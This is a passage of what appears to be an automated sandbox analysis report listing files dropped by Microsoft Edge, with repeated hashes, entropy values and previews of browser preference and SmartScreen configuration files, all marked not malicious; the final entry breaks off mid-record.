                                                                                                                                                                                                                                                            Entropy (8bit):6.090971842355162
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:109FA8C6BA337DA4A3D49E960B3B31D3
                                                                                                                                                                                                                                                            SHA1:C72913D250CCE1604C3947615C0180E326F2BCAB
                                                                                                                                                                                                                                                            SHA-256:E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
                                                                                                                                                                                                                                                            SHA-512:D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41976
                                                                                                                                                                                                                                                            Entropy (8bit):6.090971842355162
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:109FA8C6BA337DA4A3D49E960B3B31D3
                                                                                                                                                                                                                                                            SHA1:C72913D250CCE1604C3947615C0180E326F2BCAB
                                                                                                                                                                                                                                                            SHA-256:E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
                                                                                                                                                                                                                                                            SHA-512:D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41976
                                                                                                                                                                                                                                                            Entropy (8bit):6.090971842355162
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:109FA8C6BA337DA4A3D49E960B3B31D3
                                                                                                                                                                                                                                                            SHA1:C72913D250CCE1604C3947615C0180E326F2BCAB
                                                                                                                                                                                                                                                            SHA-256:E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
                                                                                                                                                                                                                                                            SHA-512:D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41976
                                                                                                                                                                                                                                                            Entropy (8bit):6.090971842355162
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:109FA8C6BA337DA4A3D49E960B3B31D3
                                                                                                                                                                                                                                                            SHA1:C72913D250CCE1604C3947615C0180E326F2BCAB
                                                                                                                                                                                                                                                            SHA-256:E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
                                                                                                                                                                                                                                                            SHA-512:D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41976
                                                                                                                                                                                                                                                            Entropy (8bit):6.090971842355162
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:109FA8C6BA337DA4A3D49E960B3B31D3
                                                                                                                                                                                                                                                            SHA1:C72913D250CCE1604C3947615C0180E326F2BCAB
                                                                                                                                                                                                                                                            SHA-256:E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
                                                                                                                                                                                                                                                            SHA-512:D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41976
                                                                                                                                                                                                                                                            Entropy (8bit):6.090971842355162
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:109FA8C6BA337DA4A3D49E960B3B31D3
                                                                                                                                                                                                                                                            SHA1:C72913D250CCE1604C3947615C0180E326F2BCAB
                                                                                                                                                                                                                                                            SHA-256:E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
                                                                                                                                                                                                                                                            SHA-512:D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41976
                                                                                                                                                                                                                                                            Entropy (8bit):6.090971842355162
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:109FA8C6BA337DA4A3D49E960B3B31D3
                                                                                                                                                                                                                                                            SHA1:C72913D250CCE1604C3947615C0180E326F2BCAB
                                                                                                                                                                                                                                                            SHA-256:E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
                                                                                                                                                                                                                                                            SHA-512:D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41976
                                                                                                                                                                                                                                                            Entropy (8bit):6.090971842355162
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:109FA8C6BA337DA4A3D49E960B3B31D3
                                                                                                                                                                                                                                                            SHA1:C72913D250CCE1604C3947615C0180E326F2BCAB
                                                                                                                                                                                                                                                            SHA-256:E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
                                                                                                                                                                                                                                                            SHA-512:D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):47
                                                                                                                                                                                                                                                            Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                            MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                            SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                            SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                            SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35
                                                                                                                                                                                                                                                            Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                            MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                            SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                            SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                            SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                                            Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                            MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                            SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                            SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                            SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):130439
                                                                                                                                                                                                                                                            Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                            MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                            SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                            SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                            SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                            Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                            MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                            SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                            SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                            SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):57
                                                                                                                                                                                                                                                            Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                            MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                            SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
